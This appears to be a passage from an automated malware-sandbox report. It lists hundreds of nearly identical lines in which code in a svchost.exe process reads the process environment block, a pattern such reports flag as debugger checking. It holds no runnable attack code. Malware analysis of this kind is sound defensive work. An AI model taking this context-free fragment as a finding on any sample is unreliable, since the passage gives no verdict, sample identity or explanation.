            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6E443 mov eax, dword ptr fs:[00000030h]2_2_02F6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6E443 mov eax, dword ptr fs:[00000030h]2_2_02F6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6A430 mov eax, dword ptr fs:[00000030h]2_2_02F6A430
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2E420 mov eax, dword ptr fs:[00000030h]2_2_02F2E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2E420 mov eax, dword ptr fs:[00000030h]2_2_02F2E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2E420 mov eax, dword ptr fs:[00000030h]2_2_02F2E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2C427 mov eax, dword ptr fs:[00000030h]2_2_02F2C427
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB6420 mov eax, dword ptr fs:[00000030h]2_2_02FB6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB6420 mov eax, dword ptr fs:[00000030h]2_2_02FB6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB6420 mov eax, dword ptr fs:[00000030h]2_2_02FB6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB6420 mov eax, dword ptr fs:[00000030h]2_2_02FB6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB6420 mov eax, dword ptr fs:[00000030h]2_2_02FB6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB6420 mov eax, dword ptr fs:[00000030h]2_2_02FB6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB6420 mov eax, dword ptr fs:[00000030h]2_2_02FB6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F68402 mov eax, dword ptr fs:[00000030h]2_2_02F68402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F68402 mov eax, dword ptr fs:[00000030h]2_2_02F68402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F68402 mov eax, dword ptr fs:[00000030h]2_2_02F68402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5E5E7 mov eax, dword ptr fs:[00000030h]2_2_02F5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5E5E7 mov eax, dword ptr fs:[00000030h]2_2_02F5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5E5E7 mov eax, dword ptr fs:[00000030h]2_2_02F5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5E5E7 mov eax, dword ptr fs:[00000030h]2_2_02F5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5E5E7 mov eax, dword ptr fs:[00000030h]2_2_02F5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5E5E7 mov eax, dword ptr fs:[00000030h]2_2_02F5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5E5E7 mov eax, dword ptr fs:[00000030h]2_2_02F5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5E5E7 mov eax, dword ptr fs:[00000030h]2_2_02F5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F325E0 mov eax, dword ptr fs:[00000030h]2_2_02F325E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6C5ED mov eax, dword ptr fs:[00000030h]2_2_02F6C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6C5ED mov eax, dword ptr fs:[00000030h]2_2_02F6C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F365D0 mov eax, dword ptr fs:[00000030h]2_2_02F365D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6A5D0 mov eax, dword ptr fs:[00000030h]2_2_02F6A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6A5D0 mov eax, dword ptr fs:[00000030h]2_2_02F6A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6E5CF mov eax, dword ptr fs:[00000030h]2_2_02F6E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6E5CF mov eax, dword ptr fs:[00000030h]2_2_02F6E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F545B1 mov eax, dword ptr fs:[00000030h]2_2_02F545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F545B1 mov eax, dword ptr fs:[00000030h]2_2_02F545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB05A7 mov eax, dword ptr fs:[00000030h]2_2_02FB05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB05A7 mov eax, dword ptr fs:[00000030h]2_2_02FB05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB05A7 mov eax, dword ptr fs:[00000030h]2_2_02FB05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6E59C mov eax, dword ptr fs:[00000030h]2_2_02F6E59C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F32582 mov eax, dword ptr fs:[00000030h]2_2_02F32582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F32582 mov ecx, dword ptr fs:[00000030h]2_2_02F32582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F64588 mov eax, dword ptr fs:[00000030h]2_2_02F64588
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6656A mov eax, dword ptr fs:[00000030h]2_2_02F6656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6656A mov eax, dword ptr fs:[00000030h]2_2_02F6656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6656A mov eax, dword ptr fs:[00000030h]2_2_02F6656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F38550 mov eax, dword ptr fs:[00000030h]2_2_02F38550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F38550 mov eax, dword ptr fs:[00000030h]2_2_02F38550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F40535 mov eax, dword ptr fs:[00000030h]2_2_02F40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F40535 mov eax, dword ptr fs:[00000030h]2_2_02F40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F40535 mov eax, dword ptr fs:[00000030h]2_2_02F40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F40535 mov eax, dword ptr fs:[00000030h]2_2_02F40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F40535 mov eax, dword ptr fs:[00000030h]2_2_02F40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F40535 mov eax, dword ptr fs:[00000030h]2_2_02F40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5E53E mov eax, dword ptr fs:[00000030h]2_2_02F5E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5E53E mov eax, dword ptr fs:[00000030h]2_2_02F5E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5E53E mov eax, dword ptr fs:[00000030h]2_2_02F5E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5E53E mov eax, dword ptr fs:[00000030h]2_2_02F5E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5E53E mov eax, dword ptr fs:[00000030h]2_2_02F5E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FC6500 mov eax, dword ptr fs:[00000030h]2_2_02FC6500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6AAEE mov eax, dword ptr fs:[00000030h]2_2_02F6AAEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6AAEE mov eax, dword ptr fs:[00000030h]2_2_02F6AAEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F30AD0 mov eax, dword ptr fs:[00000030h]2_2_02F30AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F64AD0 mov eax, dword ptr fs:[00000030h]2_2_02F64AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F64AD0 mov eax, dword ptr fs:[00000030h]2_2_02F64AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F86ACC mov eax, dword ptr fs:[00000030h]2_2_02F86ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F86ACC mov eax, dword ptr fs:[00000030h]2_2_02F86ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F86ACC mov eax, dword ptr fs:[00000030h]2_2_02F86ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F38AA0 mov eax, dword ptr fs:[00000030h]2_2_02F38AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F38AA0 mov eax, dword ptr fs:[00000030h]2_2_02F38AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F86AA4 mov eax, dword ptr fs:[00000030h]2_2_02F86AA4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F68A90 mov edx, dword ptr fs:[00000030h]2_2_02F68A90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3EA80 mov eax, dword ptr fs:[00000030h]2_2_02F3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3EA80 mov eax, dword ptr fs:[00000030h]2_2_02F3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3EA80 mov eax, dword ptr fs:[00000030h]2_2_02F3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3EA80 mov eax, dword ptr fs:[00000030h]2_2_02F3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3EA80 mov eax, dword ptr fs:[00000030h]2_2_02F3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3EA80 mov eax, dword ptr fs:[00000030h]2_2_02F3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3EA80 mov eax, dword ptr fs:[00000030h]2_2_02F3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3EA80 mov eax, dword ptr fs:[00000030h]2_2_02F3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3EA80 mov eax, dword ptr fs:[00000030h]2_2_02F3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FACA72 mov eax, dword ptr fs:[00000030h]2_2_02FACA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FACA72 mov eax, dword ptr fs:[00000030h]2_2_02FACA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6CA6F mov eax, dword ptr fs:[00000030h]2_2_02F6CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6CA6F mov eax, dword ptr fs:[00000030h]2_2_02F6CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6CA6F mov eax, dword ptr fs:[00000030h]2_2_02F6CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FDEA60 mov eax, dword ptr fs:[00000030h]2_2_02FDEA60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F36A50 mov eax, dword ptr fs:[00000030h]2_2_02F36A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F36A50 mov eax, dword ptr fs:[00000030h]2_2_02F36A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F36A50 mov eax, dword ptr fs:[00000030h]2_2_02F36A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F36A50 mov eax, dword ptr fs:[00000030h]2_2_02F36A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F36A50 mov eax, dword ptr fs:[00000030h]2_2_02F36A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F36A50 mov eax, dword ptr fs:[00000030h]2_2_02F36A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F36A50 mov eax, dword ptr fs:[00000030h]2_2_02F36A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F40A5B mov eax, dword ptr fs:[00000030h]2_2_02F40A5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F40A5B mov eax, dword ptr fs:[00000030h]2_2_02F40A5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F54A35 mov eax, dword ptr fs:[00000030h]2_2_02F54A35
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F54A35 mov eax, dword ptr fs:[00000030h]2_2_02F54A35
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6CA38 mov eax, dword ptr fs:[00000030h]2_2_02F6CA38
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6CA24 mov eax, dword ptr fs:[00000030h]2_2_02F6CA24
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5EA2E mov eax, dword ptr fs:[00000030h]2_2_02F5EA2E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FBCA11 mov eax, dword ptr fs:[00000030h]2_2_02FBCA11
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F38BF0 mov eax, dword ptr fs:[00000030h]2_2_02F38BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F38BF0 mov eax, dword ptr fs:[00000030h]2_2_02F38BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F38BF0 mov eax, dword ptr fs:[00000030h]2_2_02F38BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5EBFC mov eax, dword ptr fs:[00000030h]2_2_02F5EBFC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FBCBF0 mov eax, dword ptr fs:[00000030h]2_2_02FBCBF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FDEBD0 mov eax, dword ptr fs:[00000030h]2_2_02FDEBD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F50BCB mov eax, dword ptr fs:[00000030h]2_2_02F50BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F50BCB mov eax, dword ptr fs:[00000030h]2_2_02F50BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F50BCB mov eax, dword ptr fs:[00000030h]2_2_02F50BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F30BCD mov eax, dword ptr fs:[00000030h]2_2_02F30BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F30BCD mov eax, dword ptr fs:[00000030h]2_2_02F30BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F30BCD mov eax, dword ptr fs:[00000030h]2_2_02F30BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F40BBE mov eax, dword ptr fs:[00000030h]2_2_02F40BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F40BBE mov eax, dword ptr fs:[00000030h]2_2_02F40BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FE4BB0 mov eax, dword ptr fs:[00000030h]2_2_02FE4BB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FE4BB0 mov eax, dword ptr fs:[00000030h]2_2_02FE4BB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03004A80 mov eax, dword ptr fs:[00000030h]2_2_03004A80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2CB7E mov eax, dword ptr fs:[00000030h]2_2_02F2CB7E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FDEB50 mov eax, dword ptr fs:[00000030h]2_2_02FDEB50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FE4B4B mov eax, dword ptr fs:[00000030h]2_2_02FE4B4B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FE4B4B mov eax, dword ptr fs:[00000030h]2_2_02FE4B4B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FC6B40 mov eax, dword ptr fs:[00000030h]2_2_02FC6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FC6B40 mov eax, dword ptr fs:[00000030h]2_2_02FC6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FFAB40 mov eax, dword ptr fs:[00000030h]2_2_02FFAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FD8B42 mov eax, dword ptr fs:[00000030h]2_2_02FD8B42
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5EB20 mov eax, dword ptr fs:[00000030h]2_2_02F5EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5EB20 mov eax, dword ptr fs:[00000030h]2_2_02F5EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FF8B28 mov eax, dword ptr fs:[00000030h]2_2_02FF8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FF8B28 mov eax, dword ptr fs:[00000030h]2_2_02FF8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FAEB1D mov eax, dword ptr fs:[00000030h]2_2_02FAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FAEB1D mov eax, dword ptr fs:[00000030h]2_2_02FAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FAEB1D mov eax, dword ptr fs:[00000030h]2_2_02FAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FAEB1D mov eax, dword ptr fs:[00000030h]2_2_02FAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FAEB1D mov eax, dword ptr fs:[00000030h]2_2_02FAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FAEB1D mov eax, dword ptr fs:[00000030h]2_2_02FAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FAEB1D mov eax, dword ptr fs:[00000030h]2_2_02FAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FAEB1D mov eax, dword ptr fs:[00000030h]2_2_02FAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FAEB1D mov eax, dword ptr fs:[00000030h]2_2_02FAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6C8F9 mov eax, dword ptr fs:[00000030h]2_2_02F6C8F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6C8F9 mov eax, dword ptr fs:[00000030h]2_2_02F6C8F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FFA8E4 mov eax, dword ptr fs:[00000030h]2_2_02FFA8E4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5E8C0 mov eax, dword ptr fs:[00000030h]2_2_02F5E8C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FBC89D mov eax, dword ptr fs:[00000030h]2_2_02FBC89D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F30887 mov eax, dword ptr fs:[00000030h]2_2_02F30887
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FBE872 mov eax, dword ptr fs:[00000030h]2_2_02FBE872
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FBE872 mov eax, dword ptr fs:[00000030h]2_2_02FBE872
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FC6870 mov eax, dword ptr fs:[00000030h]2_2_02FC6870
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FC6870 mov eax, dword ptr fs:[00000030h]2_2_02FC6870
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F60854 mov eax, dword ptr fs:[00000030h]2_2_02F60854
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F34859 mov eax, dword ptr fs:[00000030h]2_2_02F34859
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F34859 mov eax, dword ptr fs:[00000030h]2_2_02F34859
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F42840 mov ecx, dword ptr fs:[00000030h]2_2_02F42840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F52835 mov eax, dword ptr fs:[00000030h]2_2_02F52835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F52835 mov eax, dword ptr fs:[00000030h]2_2_02F52835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F52835 mov eax, dword ptr fs:[00000030h]2_2_02F52835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F52835 mov ecx, dword ptr fs:[00000030h]2_2_02F52835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F52835 mov eax, dword ptr fs:[00000030h]2_2_02F52835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F52835 mov eax, dword ptr fs:[00000030h]2_2_02F52835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6A830 mov eax, dword ptr fs:[00000030h]2_2_02F6A830
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FD483A mov eax, dword ptr fs:[00000030h]2_2_02FD483A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FD483A mov eax, dword ptr fs:[00000030h]2_2_02FD483A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FBC810 mov eax, dword ptr fs:[00000030h]2_2_02FBC810
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F629F9 mov eax, dword ptr fs:[00000030h]2_2_02F629F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F629F9 mov eax, dword ptr fs:[00000030h]2_2_02F629F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FBE9E0 mov eax, dword ptr fs:[00000030h]2_2_02FBE9E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3A9D0 mov eax, dword ptr fs:[00000030h]2_2_02F3A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3A9D0 mov eax, dword ptr fs:[00000030h]2_2_02F3A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3A9D0 mov eax, dword ptr fs:[00000030h]2_2_02F3A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3A9D0 mov eax, dword ptr fs:[00000030h]2_2_02F3A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3A9D0 mov eax, dword ptr fs:[00000030h]2_2_02F3A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3A9D0 mov eax, dword ptr fs:[00000030h]2_2_02F3A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F649D0 mov eax, dword ptr fs:[00000030h]2_2_02F649D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FFA9D3 mov eax, dword ptr fs:[00000030h]2_2_02FFA9D3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FC69C0 mov eax, dword ptr fs:[00000030h]2_2_02FC69C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB89B3 mov esi, dword ptr fs:[00000030h]2_2_02FB89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB89B3 mov eax, dword ptr fs:[00000030h]2_2_02FB89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB89B3 mov eax, dword ptr fs:[00000030h]2_2_02FB89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F429A0 mov eax, dword ptr fs:[00000030h]2_2_02F429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F429A0 mov eax, dword ptr fs:[00000030h]2_2_02F429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F429A0 mov eax, dword ptr fs:[00000030h]2_2_02F429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F429A0 mov eax, dword ptr fs:[00000030h]2_2_02F429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F429A0 mov eax, dword ptr fs:[00000030h]2_2_02F429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F429A0 mov eax, dword ptr fs:[00000030h]2_2_02F429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F429A0 mov eax, dword ptr fs:[00000030h]2_2_02F429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F429A0 mov eax, dword ptr fs:[00000030h]2_2_02F429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F429A0 mov eax, dword ptr fs:[00000030h]2_2_02F429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F429A0 mov eax, dword ptr fs:[00000030h]2_2_02F429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F429A0 mov eax, dword ptr fs:[00000030h]2_2_02F429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F429A0 mov eax, dword ptr fs:[00000030h]2_2_02F429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F429A0 mov eax, dword ptr fs:[00000030h]2_2_02F429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F309AD mov eax, dword ptr fs:[00000030h]2_2_02F309AD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F309AD mov eax, dword ptr fs:[00000030h]2_2_02F309AD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FD4978 mov eax, dword ptr fs:[00000030h]2_2_02FD4978
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FD4978 mov eax, dword ptr fs:[00000030h]2_2_02FD4978
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FBC97C mov eax, dword ptr fs:[00000030h]2_2_02FBC97C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F56962 mov eax, dword ptr fs:[00000030h]2_2_02F56962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F56962 mov eax, dword ptr fs:[00000030h]2_2_02F56962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F56962 mov eax, dword ptr fs:[00000030h]2_2_02F56962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F7096E mov eax, dword ptr fs:[00000030h]2_2_02F7096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F7096E mov edx, dword ptr fs:[00000030h]2_2_02F7096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F7096E mov eax, dword ptr fs:[00000030h]2_2_02F7096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB0946 mov eax, dword ptr fs:[00000030h]2_2_02FB0946
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB892A mov eax, dword ptr fs:[00000030h]2_2_02FB892A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FC892B mov eax, dword ptr fs:[00000030h]2_2_02FC892B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FBC912 mov eax, dword ptr fs:[00000030h]2_2_02FBC912
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F28918 mov eax, dword ptr fs:[00000030h]2_2_02F28918
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F28918 mov eax, dword ptr fs:[00000030h]2_2_02F28918
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FAE908 mov eax, dword ptr fs:[00000030h]2_2_02FAE908
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FAE908 mov eax, dword ptr fs:[00000030h]2_2_02FAE908
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F68EF5 mov eax, dword ptr fs:[00000030h]2_2_02F68EF5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F36EE0 mov eax, dword ptr fs:[00000030h]2_2_02F36EE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F36EE0 mov eax, dword ptr fs:[00000030h]2_2_02F36EE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F36EE0 mov eax, dword ptr fs:[00000030h]2_2_02F36EE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F36EE0 mov eax, dword ptr fs:[00000030h]2_2_02F36EE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FE6ED0 mov ecx, dword ptr fs:[00000030h]2_2_02FE6ED0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FCAEB0 mov eax, dword ptr fs:[00000030h]2_2_02FCAEB0
